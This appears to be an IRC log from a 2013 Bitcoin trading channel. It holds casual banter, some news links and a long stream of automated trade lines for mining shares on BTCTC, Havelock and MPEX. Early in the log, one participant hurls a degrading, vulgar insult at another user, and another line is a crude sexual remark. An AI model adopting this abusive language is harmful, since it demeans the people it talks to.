mp, is this a meme yet? http://chinezu.eu/wp-content/uploads/2010/03/gizeh_pyramids.jpg Jul 26 01:15:00 someone shared it in the forums Jul 26 01:15:19 needs some photochopping to place you in diff situations Jul 26 01:15:34 heh, horrible suit btw Jul 26 01:16:35 dub sounds great. Jul 26 01:16:39 ThickAsThieves it is in romania yeah Jul 26 01:16:42 [BTCTC] [TAT.ASICMINER] 6 @ 0.045 = 0.27 BTC [+] Jul 26 01:16:49 Apocalyptic what's wrong with it ? Jul 26 01:17:36 it just doesn't fit you well i find, kinda too large Jul 26 01:17:39 [BTCTC] [ASICMINER-PT] 1 @ 4.724 BTC [+] Jul 26 01:18:01 i never went for that entire tight thing. Jul 26 01:18:04 im a skinny fuck. Jul 26 01:18:43 yah, an organisation where analingus is most valuable competency is going places Jul 26 01:18:44 http://www.nytimes.com/2013/07/26/science/false-memory-planted-in-a-mouse-brain-study-shows.html?smid=tw-share&_r=0 Jul 26 01:18:46 anyway, i took that suit from horseback riding in the sands of the sahara to horseback riding on central america's volcanoes. it actually held up like a champ. Jul 26 01:19:02 dub don't underestimate the power of obedience. Jul 26 01:19:09 it's much more powerful than self-entitledness. Jul 26 01:19:15 you kinda look like a rabbi in it, for some reason Jul 26 01:19:33 probably because of the beard. Jul 26 01:21:21 [BTCTC] [AMC-PT] 1 @ 0.003895 BTC [+] Jul 26 01:22:04 MPOE-PR is trying to tell you something "You need better research, seriously now. (Yes there's a massive volume of wrong stuff in your post, I'm just picking a couple cause I'm not getting paid enough for the whole thing.)" Jul 26 01:22:22 [BTCTC] [AMC-PT] 2 @ 0.003895 = 0.0078 BTC [+] Jul 26 01:22:23 [BTCTC] [B.YABMC] 1 @ 0.002849 BTC [+] Jul 26 01:22:41 pay the woman! Jul 26 01:25:30 [BTCTC] [TAT.VIRTUALMINE] 75 @ 0.003099 = 0.2324 BTC [+] Jul 26 01:25:32 [BTCTC] [TAT.VIRTUALMINE] 23 @ 0.003001 = 0.069 BTC [-] Jul 26 01:25:34 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003 = 0.006 BTC [-] Jul 26 01:26:08 tieriusvii , I just finished taking my shit, be a good bitch and come wipe my ass Jul 26 01:26:52 A day later, in a completely different environment, the researchers delivered an electric shock to the mice at the same time that they stimulated the previously identified brain cells to trigger the earlier memory. << kinda clever clever >_< Jul 26 01:27:30 [BTCTC] [TAT.ASICMINER] 7 @ 0.045 = 0.315 BTC [+] Jul 26 01:27:40 [BTCTC] [KENILWORTH] 1000 @ 0.0018 = 1.8 BTC [-] Jul 26 01:27:44 ThickAsThieves lol she has been on a roll on teh forum Jul 26 01:28:01 [BTCTC] [TAT.ASICMINER] 12 @ 0.04499 = 0.5399 BTC [-] Jul 26 01:28:14 [HAVELOCK] [SMG] 185 @ 0.00027 = 0.05 BTC [+] Jul 26 01:28:40 lmao. "https://bitcointalk.org/index.php?topic=261235.160 i guess that has meanwhile turned into a MP fascination thread" Jul 26 01:29:04 i guess im a very successful photobloggar. Jul 26 01:30:25 [BTCTC] [TAT.ASICMINER] 43 @ 0.045 = 1.935 BTC [+] Jul 26 01:31:23 [HAVELOCK] [HIM] 2 @ 0.155 = 0.31 BTC [+] Jul 26 01:31:31 [HAVELOCK] [HIM] 3 @ 0.155 = 0.465 BTC [+] Jul 26 01:31:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.045 = 0.135 BTC [+] Jul 26 01:39:51 [BTCTC] [RSM] 16 @ 0.0142 = 0.2272 BTC [-] Jul 26 01:39:52 [BTCTC] [RSM] 89 @ 0.0122 = 1.0858 BTC [-] Jul 26 01:39:57 [BTCTC] [AMC-PT] 5 @ 0.003884 = 0.0194 BTC [-] Jul 26 01:41:37 [BTCTC] [TAT.MINIGAME] 3 @ 0.000272 = 0.0008 BTC [+] Jul 26 01:43:21 [BTCTC] [DMS.MINING] 2 @ 0.013 = 0.026 BTC [-] Jul 26 01:44:06 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003099 = 0.0093 BTC [+] Jul 26 01:46:27 [HAVELOCK] [AM100] 117 @ 0.04359989 = 5.1012 BTC [-] Jul 26 01:46:47 [HAVELOCK] [SDSTM] 3 @ 0.00932 = 0.028 BTC [-] Jul 26 01:46:50 [HAVELOCK] [SDSTM] 5 @ 0.00931 = 0.0466 BTC [-] Jul 26 01:46:52 [HAVELOCK] [SDSTM] 4 @ 0.0093 = 0.0372 BTC [-] Jul 26 01:46:54 [HAVELOCK] [SDSTM] 4 @ 0.00929 = 0.0372 BTC [-] Jul 26 01:46:56 [HAVELOCK] [SDSTM] 75 @ 0.009271 = 0.6953 BTC [-] Jul 26 01:46:59 [HAVELOCK] [SDSTM] 3 @ 0.009261 = 0.0278 BTC [-] Jul 26 01:47:01 [HAVELOCK] [SDSTM] 8 @ 0.00925 = 0.074 BTC [-] Jul 26 01:47:03 [HAVELOCK] [SDSTM] 2 @ 0.00924 = 0.0185 BTC [-] Jul 26 01:47:05 [HAVELOCK] [SDSTM] 24 @ 0.00923 = 0.2215 BTC [-] Jul 26 01:47:07 [HAVELOCK] [SDSTM] 6 @ 0.00922 = 0.0553 BTC [-] Jul 26 01:47:08 [HAVELOCK] [SDSTM] 3 @ 0.009201 = 0.0276 BTC [-] Jul 26 01:47:10 [HAVELOCK] [SDSTM] 7 @ 0.0092001 = 0.0644 BTC [-] Jul 26 01:47:12 [HAVELOCK] [SDSTM] 6 @ 0.00920002 = 0.0552 BTC [-] Jul 26 01:48:01 [HAVELOCK] [SDSTM] 235 @ 0.00920002 = 2.162 BTC [-] Jul 26 01:48:16 [HAVELOCK] [SDSTM] 3 @ 0.01049 = 0.0315 BTC [+] Jul 26 01:50:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.04499 = 0.09 BTC [-] Jul 26 01:51:25 [BTCTC] [AMC-PT] 12 @ 0.003884 = 0.0466 BTC [-] Jul 26 01:51:29 [HAVELOCK] [AM100] 31 @ 0.04359989 = 1.3516 BTC [-] Jul 26 01:52:18 [HAVELOCK] [AM100] 52 @ 0.04359989 = 2.2672 BTC [-] Jul 26 01:53:09 [HAVELOCK] [SDSTM] 6 @ 0.01049 = 0.0629 BTC [+] Jul 26 01:53:19 [MPEX] [S.MPOE] 3600 @ 0.0008641 = 3.1108 BTC [-] Jul 26 01:54:27 [BTCTC] [BASIC-MINING] 17 @ 0.51 = 8.67 BTC [+] Jul 26 01:58:34 [HAVELOCK] [SDSTM] 171 @ 0.01049 = 1.7938 BTC [+] Jul 26 01:58:49 [HAVELOCK] [HIM] 8 @ 0.16 = 1.28 BTC [+] Jul 26 01:58:57 [HAVELOCK] [HIM] 3 @ 0.17 = 0.51 BTC [+] Jul 26 02:02:01 [BTCTC] [BASIC-MINING] 1 @ 0.51 BTC [+] Jul 26 02:02:29 [BTCTC] [DMS.SELLING] 30 @ 0.01996 = 0.5988 BTC [+] Jul 26 02:02:35 [HAVELOCK] [AM100] 7 @ 0.043111 = 0.3018 BTC [-] Jul 26 02:02:38 [BTCTC] [DMS.MINING] 30 @ 0.013 = 0.39 BTC [-] Jul 26 02:02:40 [HAVELOCK] [AM100] 1 @ 0.043111 BTC [-] Jul 26 02:02:47 [HAVELOCK] [AM100] 5 @ 0.04311 = 0.2156 BTC [-] Jul 26 02:04:40 [BTCTC] [AMC-PT] 25 @ 0.003885 = 0.0971 BTC [+] Jul 26 02:04:42 [BTCTC] [AMC-PT] 6 @ 0.003895 = 0.0234 BTC [+] Jul 26 02:04:43 [BTCTC] [AMC-PT] 36 @ 0.003896 = 0.1403 BTC [+] Jul 26 02:08:37 [HAVELOCK] [AM100] 8 @ 0.04339989 = 0.3472 BTC [+] Jul 26 02:09:08 [BTCTC] [AMC-PT] 1 @ 0.003884 BTC [-] Jul 26 02:09:43 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003091 = 0.0773 BTC [-] Jul 26 02:10:02 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003092 = 0.3092 BTC [+] Jul 26 02:10:53 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003099 = 0.0775 BTC [+] Jul 26 02:11:26 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003099 = 0.0775 BTC [+] Jul 26 02:12:16 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003099 = 0.0775 BTC [+] Jul 26 02:12:43 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.003099 = 0.0248 BTC [+] Jul 26 02:12:46 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.003099 = 0.0124 BTC [+] Jul 26 02:13:29 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003098 BTC [-] Jul 26 02:22:05 [HAVELOCK] [AM100] 11 @ 0.04311 = 0.4742 BTC [-] Jul 26 02:22:08 [HAVELOCK] [AM100] 20 @ 0.04300001 = 0.86 BTC [-] Jul 26 02:22:10 [HAVELOCK] [AM100] 5 @ 0.043 = 0.215 BTC [-] Jul 26 02:22:12 [HAVELOCK] [AM100] 114 @ 0.0429001 = 4.8906 BTC [-] Jul 26 02:22:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.045 = 0.18 BTC [+] Jul 26 02:23:10 [HAVELOCK] [HIM] 2 @ 0.17 = 0.34 BTC [+] Jul 26 02:25:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.045 = 0.135 BTC [+] Jul 26 02:25:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.04501 = 0.2701 BTC [+] Jul 26 02:26:50 [BTCTC] [LTC-ATF.B2] 1 @ 0.01024 BTC [+] Jul 26 02:27:19 [BTCTC] [AMC-PT] 1 @ 0.00389 BTC [+] Jul 26 02:33:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [-] Jul 26 02:39:15 [HAVELOCK] [SMG] 110 @ 0.000264 = 0.029 BTC [-] Jul 26 02:39:23 [HAVELOCK] [SMG] 883 @ 0.000263 = 0.2322 BTC [-] Jul 26 02:39:29 [HAVELOCK] [SMG] 20 @ 0.00026101 = 0.0052 BTC [-] Jul 26 02:39:35 [HAVELOCK] [SMG] 100 @ 0.000261 = 0.0261 BTC [-] Jul 26 02:39:44 [HAVELOCK] [SMG] 88 @ 0.00026001 = 0.0229 BTC [-] Jul 26 02:40:54 [HAVELOCK] [AM1] 1 @ 4.45 BTC [+] Jul 26 02:43:27 [HAVELOCK] [AM100] 3 @ 0.043 = 0.129 BTC [+] Jul 26 02:44:40 [BTCTC] [COGNITIVE] 2 @ 0.6349 = 1.2698 BTC [+] Jul 26 02:44:42 [BTCTC] [COGNITIVE] 1 @ 0.6349 BTC [+] Jul 26 02:45:56 [HAVELOCK] [HIM] 6 @ 0.17 = 1.02 BTC [+] Jul 26 02:46:33 [BTCTC] [AMC-PT] 192 @ 0.003889 = 0.7467 BTC [-] Jul 26 02:46:35 [BTCTC] [AMC-PT] 498 @ 0.00389 = 1.9372 BTC [+] Jul 26 02:46:35 [BTCTC] [AMC-PT] 44 @ 0.003896 = 0.1714 BTC [+] Jul 26 02:46:37 [BTCTC] [AMC-PT] 571 @ 0.0039 = 2.2269 BTC [+] Jul 26 02:47:12 [HAVELOCK] [SMG] 899 @ 0.00026 = 0.2337 BTC [-] Jul 26 02:48:12 [BTCTC] [COGNITIVE] 10 @ 0.635 = 6.35 BTC [+] Jul 26 02:48:34 [BTCTC] [TAT.ASICMINER] 6 @ 0.045 = 0.27 BTC [-] Jul 26 02:48:36 [BTCTC] [TAT.ASICMINER] 47 @ 0.045 = 2.115 BTC [-] Jul 26 02:48:38 [BTCTC] [TAT.ASICMINER] 47 @ 0.04501 = 2.1155 BTC [+] Jul 26 02:53:56 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003099 = 0.0775 BTC [+] Jul 26 02:53:58 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0031 BTC [+] Jul 26 02:53:59 [BTCTC] [TAT.VIRTUALMINE] 39 @ 0.0031 = 0.1209 BTC [+] Jul 26 02:55:16 [BTCTC] [TAT.ASICMINER] 100 @ 0.0446 = 4.46 BTC [-] Jul 26 02:56:00 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003099 = 0.0775 BTC [-] Jul 26 02:56:19 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003099 = 0.0775 BTC [-] Jul 26 02:56:21 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.0031 = 0.1116 BTC [+] Jul 26 02:56:58 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.0031 = 0.0434 BTC [+] Jul 26 02:58:35 [BTCTC] [BTC-BOND] 113 @ 0.00996 = 1.1255 BTC [+] Jul 26 02:58:48 [BTCTC] [BTC-BOND] 10 @ 0.00995 = 0.0995 BTC [-] Jul 26 02:59:07 [BTCTC] [BTC-BOND] 2 @ 0.00993 = 0.0199 BTC [-] Jul 26 02:59:09 [BTCTC] [BTC-BOND] 15 @ 0.009921 = 0.1488 BTC [-] Jul 26 02:59:13 [BTCTC] [BTC-BOND] 100 @ 0.009921 = 0.9921 BTC [-] Jul 26 02:59:15 [BTCTC] [BTC-BOND] 28 @ 0.00992 = 0.2778 BTC [-] Jul 26 02:59:17 [BTCTC] [BTC-BOND] 10 @ 0.009907 = 0.0991 BTC [-] Jul 26 02:59:19 [BTCTC] [BTC-BOND] 1000 @ 0.009906 = 9.906 BTC [-] Jul 26 02:59:51 [BTCTC] [BTC-BOND] 100 @ 0.009905 = 0.9905 BTC [-] Jul 26 02:59:59 [BTCTC] [AMC-PT] 2 @ 0.0039 = 0.0078 BTC [+] Jul 26 03:00:23 [BTCTC] [BTC-BOND] 10 @ 0.009904 = 0.099 BTC [-] Jul 26 03:00:23 [BTCTC] [BTC-BOND] 40 @ 0.0099 = 0.396 BTC [-] Jul 26 03:01:52 [BTCTC] [COGNITIVE] 22 @ 0.635 = 13.97 BTC [+] Jul 26 03:01:54 [BTCTC] [COGNITIVE] 15 @ 0.635 = 9.525 BTC [+] Jul 26 03:01:55 [BTCTC] [COGNITIVE] 1 @ 0.635 BTC [+] Jul 26 03:02:55 [BTCTC] [COGNITIVE] 1 @ 0.6424 BTC [+] Jul 26 03:02:57 [BTCTC] [COGNITIVE] 10 @ 0.6499 = 6.499 BTC [+] Jul 26 03:02:59 [BTCTC] [COGNITIVE] 1 @ 0.6843 BTC [+] Jul 26 03:03:01 [BTCTC] [COGNITIVE] 11 @ 0.6845 = 7.5295 BTC [+] Jul 26 03:04:14 [BTCTC] [COGNITIVE] 2 @ 0.687 = 1.374 BTC [+] Jul 26 03:04:16 [BTCTC] [COGNITIVE] 1 @ 0.69 BTC [+] Jul 26 03:04:18 [BTCTC] [COGNITIVE] 1 @ 0.696 BTC [+] Jul 26 03:04:18 [BTCTC] [COGNITIVE] 6 @ 0.72 = 4.32 BTC [+] Jul 26 03:04:20 [BTCTC] [COGNITIVE] 2 @ 0.7225 = 1.445 BTC [+] Jul 26 03:04:21 [BTCTC] [COGNITIVE] 3 @ 0.732 = 2.196 BTC [+] Jul 26 03:04:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.04501 = 0.135 BTC [+] Jul 26 03:04:25 [BTCTC] [COGNITIVE] 6 @ 0.75 = 4.5 BTC [+] Jul 26 03:04:39 [HAVELOCK] [SMG] 929 @ 0.00026 = 0.2415 BTC [-] Jul 26 03:06:11 [HAVELOCK] [SMG] 71 @ 0.0002581 = 0.0183 BTC [-] Jul 26 03:06:29 [HAVELOCK] [SMG] 2000 @ 0.0002581 = 0.5162 BTC [-] Jul 26 03:08:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.04501 = 0.18 BTC [+] Jul 26 03:08:27 [MPEX] [S.MPOE] 2700 @ 0.00086425 = 2.3335 BTC [+] Jul 26 03:08:43 [MPEX] [S.MG] 10000 @ 0.00024 = 2.4 BTC [-] Jul 26 03:09:23 [HAVELOCK] [SMG] 1929 @ 0.0002581 = 0.4979 BTC [-] Jul 26 03:09:26 [HAVELOCK] [SMG] 1000 @ 0.000258 = 0.258 BTC [-] Jul 26 03:09:28 [HAVELOCK] [SMG] 2000 @ 0.000255 = 0.51 BTC [-] Jul 26 03:09:30 [HAVELOCK] [SMG] 4000 @ 0.000255 = 1.02 BTC [-] Jul 26 03:09:32 [HAVELOCK] [SMG] 1071 @ 0.00025401 = 0.272 BTC [-] Jul 26 03:09:47 [BTCTC] [COGNITIVE] 3 @ 0.7519 = 2.2557 BTC [+] Jul 26 03:09:49 [BTCTC] [COGNITIVE] 2 @ 0.755 = 1.51 BTC [+] Jul 26 03:10:06 [BTCTC] [TAT.ASICMINER] 7 @ 0.04596 = 0.3217 BTC [+] Jul 26 03:11:20 [MPEX] [S.MPOE] 11400 @ 0.00086425 = 9.8525 BTC [+] Jul 26 03:15:16 [HAVELOCK] [HIM] 10 @ 0.16999999 = 1.7 BTC [-] Jul 26 03:16:17 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.0031 = 0.0341 BTC [+] Jul 26 03:27:41 [HAVELOCK] [AM100] 5 @ 0.0431 = 0.2155 BTC [+] Jul 26 03:32:31 [HAVELOCK] [AM100] 5 @ 0.0431 = 0.2155 BTC [+] Jul 26 03:34:55 [HAVELOCK] [AM100] 10 @ 0.0431 = 0.431 BTC [+] Jul 26 03:41:15 [BTCTC] [DMS.SELLING] 19 @ 0.01997 = 0.3794 BTC [+] Jul 26 03:42:44 [BTCTC] [ASICMINER-PT] 2 @ 4.684 = 9.368 BTC [-] Jul 26 03:42:46 [BTCTC] [ASICMINER-PT] 1 @ 4.67 BTC [-] Jul 26 03:42:48 [BTCTC] [ASICMINER-PT] 1 @ 4.66 BTC [-] Jul 26 03:42:49 [BTCTC] [ASICMINER-PT] 1 @ 4.654 BTC [-] Jul 26 03:42:51 [BTCTC] [ASICMINER-PT] 1 @ 4.653 BTC [-] Jul 26 03:48:50 [MPEX] [S.MPOE] 3211 @ 0.0008641 = 2.7746 BTC [-] Jul 26 03:48:52 [MPEX] [S.MPOE] 14597 @ 0.00086382 = 12.6092 BTC [-] Jul 26 03:50:14 [HAVELOCK] [AM100] 4 @ 0.04315 = 0.1726 BTC [+] Jul 26 03:50:37 [BTCTC] [ASICMINER-PT] 1 @ 4.653 BTC [-] Jul 26 03:51:24 [MPEX] [S.MPOE] 10097 @ 0.00086425 = 8.7263 BTC [+] Jul 26 03:51:26 [MPEX] [S.MPOE] 8403 @ 0.00087 = 7.3106 BTC [+] Jul 26 03:54:03 http://news.cnet.com/8301-13578_3-57595529-38/feds-tell-web-firms-to-turn-over-user-account-passwords/ Jul 26 03:54:06 Feds tell Web firms to turn over user account passwords | Politics and Law - CNET News Jul 26 03:54:09 meanwhile back in teh uslag. Jul 26 03:55:06 [HAVELOCK] [HIM] 40 @ 0.1616 = 6.464 BTC [-] Jul 26 03:59:36 [HAVELOCK] [AM100] 1 @ 0.04315 BTC [+] Jul 26 03:59:59 [BTCTC] [S.MPOE-PT] 1 @ 0.0008351 BTC [+] Jul 26 04:00:01 [HAVELOCK] [AM100] 2 @ 0.0431999 = 0.0864 BTC [+] Jul 26 04:02:52 [BTCTC] [AMC-PT] 77 @ 0.00388 = 0.2988 BTC [-] Jul 26 04:05:27 [BTCTC] [KENILWORTH] 20 @ 0.0018 = 0.036 BTC [-] Jul 26 04:07:50 [BTCTC] [DMS.MINING] 20 @ 0.01261 = 0.2522 BTC [-] Jul 26 04:08:14 [BTCTC] [TAT.ASICMINER] 12 @ 0.04461 = 0.5353 BTC [-] Jul 26 04:09:48 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [-] Jul 26 04:19:04 [BTCTC] [DMS.MINING] 1 @ 0.013 BTC [+] Jul 26 04:21:35 [BTCTC] [DMS.MINING] 67 @ 0.013 = 0.871 BTC [+] Jul 26 04:21:55 [BTCTC] [DMS.MINING] 33 @ 0.01324 = 0.4369 BTC [+] Jul 26 04:23:45 [HAVELOCK] [AM100] 28 @ 0.0431999 = 1.2096 BTC [+] Jul 26 04:24:22 [BTCTC] [TAT.VIRTUALMINE] 94 @ 0.003196 = 0.3004 BTC [+] Jul 26 04:25:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.0446 = 0.446 BTC [-] Jul 26 04:25:41 [BTCTC] [BASIC-MINING] 2 @ 0.51 = 1.02 BTC [+] Jul 26 04:25:49 [BTCTC] [B.YABMC] 106 @ 0.002833 = 0.3003 BTC [-] Jul 26 04:26:33 [BTCTC] [AMC-PT] 5 @ 0.003806 = 0.019 BTC [-] Jul 26 04:35:51 [BTCTC] [DMS.MINING] 137 @ 0.01324 = 1.8139 BTC [+] Jul 26 04:42:19 [BTCTC] [BASIC-MINING] 8 @ 0.51 = 4.08 BTC [+] Jul 26 04:43:47 [BTCTC] [LTC-ATF.B2] 8 @ 0.01024 = 0.0819 BTC [+] Jul 26 04:44:33 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003101 = 0.0775 BTC [-] Jul 26 04:44:35 [BTCTC] [TAT.VIRTUALMINE] 195 @ 0.0031 = 0.6045 BTC [-] Jul 26 04:46:07 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 26 04:52:37 [BTCTC] [BASIC-MINING] 1 @ 0.5298 BTC [+] Jul 26 04:53:28 [BTCTC] [AMC-PT] 5 @ 0.003877 = 0.0194 BTC [+] Jul 26 04:56:56 [BTCTC] [AMC-PT] 1 @ 0.003878 BTC [+] Jul 26 04:56:58 [BTCTC] [AMC-PT] 1023 @ 0.00388 = 3.9692 BTC [+] Jul 26 04:56:59 [BTCTC] [AMC-PT] 227 @ 0.003895 = 0.8842 BTC [+] Jul 26 04:58:47 [BTCTC] [AMC-PT] 5 @ 0.0039 = 0.0195 BTC [+] Jul 26 05:11:53 [BTCTC] [BASIC-MINING] 1 @ 0.53 BTC [+] Jul 26 05:13:27 [BTCTC] [AMC-PT] 2534 @ 0.0039 = 9.8826 BTC [+] Jul 26 05:13:32 [BTCTC] [AMC-PT] 3 @ 0.0039 = 0.0117 BTC [+] Jul 26 05:13:34 [BTCTC] [AMC-PT] 25 @ 0.00394 = 0.0985 BTC [+] Jul 26 05:13:35 [BTCTC] [AMC-PT] 1476 @ 0.003979 = 5.873 BTC [+] Jul 26 05:13:36 [BTCTC] [AMC-PT] 1000 @ 0.00398 = 3.98 BTC [+] Jul 26 05:13:41 [BTCTC] [AMC-PT] 40 @ 0.00399 = 0.1596 BTC [+] Jul 26 05:13:43 [BTCTC] [AMC-PT] 180 @ 0.003992 = 0.7186 BTC [+] Jul 26 05:13:44 [BTCTC] [AMC-PT] 1319 @ 0.003993 = 5.2668 BTC [+] Jul 26 05:16:28 [BTCTC] [AMC-PT] 279 @ 0.003993 = 1.114 BTC [+] Jul 26 05:19:10 [BTCTC] [AMC-PT] 95 @ 0.003993 = 0.3793 BTC [+] Jul 26 05:22:17 [BTCTC] [KENILWORTH] 250 @ 0.0018 = 0.45 BTC [-] Jul 26 05:27:18 [HAVELOCK] [SDSTM] 1 @ 0.0098 BTC [-] Jul 26 05:27:46 [HAVELOCK] [AM100] 100 @ 0.0431999 = 4.32 BTC [+] Jul 26 05:30:05 [HAVELOCK] [HIM] 1 @ 0.17 BTC [+] Jul 26 05:34:37 Bitcoin Charts / Charts Jul 26 05:35:36 [BTCTC] [S.MPOE-PT] 3 @ 0.000945 = 0.0028 BTC [+] Jul 26 05:35:49 [HAVELOCK] [HIM] 9 @ 0.17 = 1.53 BTC [+] Jul 26 05:35:51 [HAVELOCK] [HIM] 10 @ 0.173 = 1.73 BTC [+] Jul 26 05:35:54 [HAVELOCK] [HIM] 10 @ 0.174 = 1.74 BTC [+] Jul 26 05:35:56 [HAVELOCK] [HIM] 10 @ 0.175 = 1.75 BTC [+] Jul 26 05:36:47 [BTCTC] [AMC-PT] 100 @ 0.003993 = 0.3993 BTC [+] Jul 26 05:37:11 [BTCTC] [AMC-PT] 150 @ 0.003993 = 0.599 BTC [+] Jul 26 05:37:48 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [-] Jul 26 05:38:01 [BTCTC] [AMC-PT] 20 @ 0.003993 = 0.0799 BTC [+] Jul 26 05:38:03 [BTCTC] [KENILWORTH] 4 @ 0.0018 = 0.0072 BTC [-] Jul 26 05:40:32 [HAVELOCK] [HIM] 5 @ 0.18 = 0.9 BTC [+] Jul 26 05:40:35 [HAVELOCK] [HIM] 5 @ 0.188888 = 0.9444 BTC [+] Jul 26 05:40:37 [HAVELOCK] [HIM] 1 @ 0.189 BTC [+] Jul 26 05:40:39 [HAVELOCK] [HIM] 22 @ 0.19 = 4.18 BTC [+] Jul 26 05:40:41 [HAVELOCK] [HIM] 17 @ 0.2 = 3.4 BTC [+] Jul 26 05:43:08 [HAVELOCK] [HIM] 8 @ 0.2 = 1.6 BTC [+] Jul 26 05:43:11 [HAVELOCK] [HIM] 20 @ 0.21 = 4.2 BTC [+] Jul 26 05:44:51 [BTCTC] [AMC-PT] 500 @ 0.003993 = 1.9965 BTC [+] Jul 26 05:46:51 https://bitcointalk.org/index.php?topic=125629.msg2805629#msg2805629 Jul 26 05:46:57 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Jul 26 05:48:03 [BTCTC] [AMC-PT] 1005 @ 0.003993 = 4.013 BTC [+] Jul 26 05:48:25 [HAVELOCK] [HIM] 12 @ 0.21 = 2.52 BTC [+] Jul 26 05:48:31 [BTCTC] [AMC-PT] 1 @ 0.003994 BTC [+] Jul 26 05:49:10 [BTCTC] [AMC-PT] 99 @ 0.003994 = 0.3954 BTC [+] Jul 26 05:49:12 [BTCTC] [TAT.ASICMINER] 35 @ 0.04594 = 1.6079 BTC [+] Jul 26 05:49:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.04595 = 0.2298 BTC [+] Jul 26 05:49:18 [BTCTC] [TAT.ASICMINER] 9 @ 0.04597 = 0.4137 BTC [+] Jul 26 05:55:21 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [-] Jul 26 05:59:40 [HAVELOCK] [AM100] 126 @ 0.0432999 = 5.4558 BTC [+] Jul 26 05:59:54 [HAVELOCK] [AM100] 74 @ 0.0432999 = 3.2042 BTC [+] Jul 26 06:01:50 [HAVELOCK] [AM100] 28 @ 0.0430003 = 1.204 BTC [-] Jul 26 06:03:56 [HAVELOCK] [AM100] 99 @ 0.0430003 = 4.257 BTC [-] Jul 26 06:03:59 [HAVELOCK] [AM100] 1 @ 0.0430002 BTC [-] Jul 26 06:05:06 [BTCTC] [ACTIVEMINING] 1 @ 0.0049 BTC Jul 26 06:08:29 [BTCTC] [ACTIVEMINING] 1 @ 0.004567 BTC [-] Jul 26 06:08:54 [BTCTC] [ACTIVEMINING] 1 @ 0.00465 BTC [+] Jul 26 06:09:23 [BTCTC] [ACTIVEMINING] 1 @ 0.00443 BTC [-] Jul 26 06:09:25 [BTCTC] [ACTIVEMINING] 1 @ 0.00435 BTC [-] Jul 26 06:09:59 [BTCTC] [ACTIVEMINING] 1 @ 0.004699 BTC [+] Jul 26 06:10:25 [BTCTC] [TAT.ASICMINER] 9 @ 0.04505 = 0.4055 BTC [-] Jul 26 06:10:28 [BTCTC] [TAT.ASICMINER] 50 @ 0.04504 = 2.252 BTC [-] Jul 26 06:10:30 [BTCTC] [TAT.ASICMINER] 7 @ 0.04501 = 0.3151 BTC [-] Jul 26 06:10:32 [BTCTC] [TAT.ASICMINER] 15 @ 0.045 = 0.675 BTC [-] Jul 26 06:10:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.04491 = 0.2246 BTC [-] Jul 26 06:10:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.0449 = 0.449 BTC [-] Jul 26 06:10:38 [BTCTC] [TAT.ASICMINER] 51 @ 0.04461 = 2.2751 BTC [-] Jul 26 06:10:57 [HAVELOCK] [AM100] 1 @ 0.0432999 BTC [+] Jul 26 06:11:12 [HAVELOCK] [AM100] 11 @ 0.0432999 = 0.4763 BTC [+] Jul 26 06:11:14 [BTCTC] [ACTIVEMINING] 1 @ 0.004397 BTC [-] Jul 26 06:11:26 [HAVELOCK] [AM100] 1 @ 0.0432999 BTC [+] Jul 26 06:12:23 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 26 06:12:31 [BTCTC] [ACTIVEMINING] 18 @ 0.003994 = 0.0719 BTC [-] Jul 26 06:12:47 [BTCTC] [ACTIVEMINING] 1 @ 0.00392 BTC [-] Jul 26 06:13:07 [BTCTC] [TAT.ASICMINER] 35 @ 0.04461 = 1.5614 BTC [-] Jul 26 06:14:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.04461 = 0.2231 BTC [-] Jul 26 06:14:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.04461 BTC [-] Jul 26 06:14:52 [BTCTC] [ACTIVEMINING] 1 @ 0.004 BTC [+] Jul 26 06:16:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0446 BTC [-] Jul 26 06:16:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.0446 = 0.0892 BTC [-] Jul 26 06:17:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0446 BTC [-] Jul 26 06:17:42 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 26 06:20:30 [BTCTC] [ACTIVEMINING] 99 @ 0.0039 = 0.3861 BTC [-] Jul 26 06:22:40 [BTCTC] [ACTIVEMINING] 14 @ 0.0039 = 0.0546 BTC [-] Jul 26 06:22:57 [BTCTC] [ACTIVEMINING] 99 @ 0.004 = 0.396 BTC [+] Jul 26 06:23:51 [BTCTC] [COGNITIVE] 3 @ 0.6715 = 2.0145 BTC [-] Jul 26 06:23:53 [BTCTC] [COGNITIVE] 10 @ 0.671 = 6.71 BTC 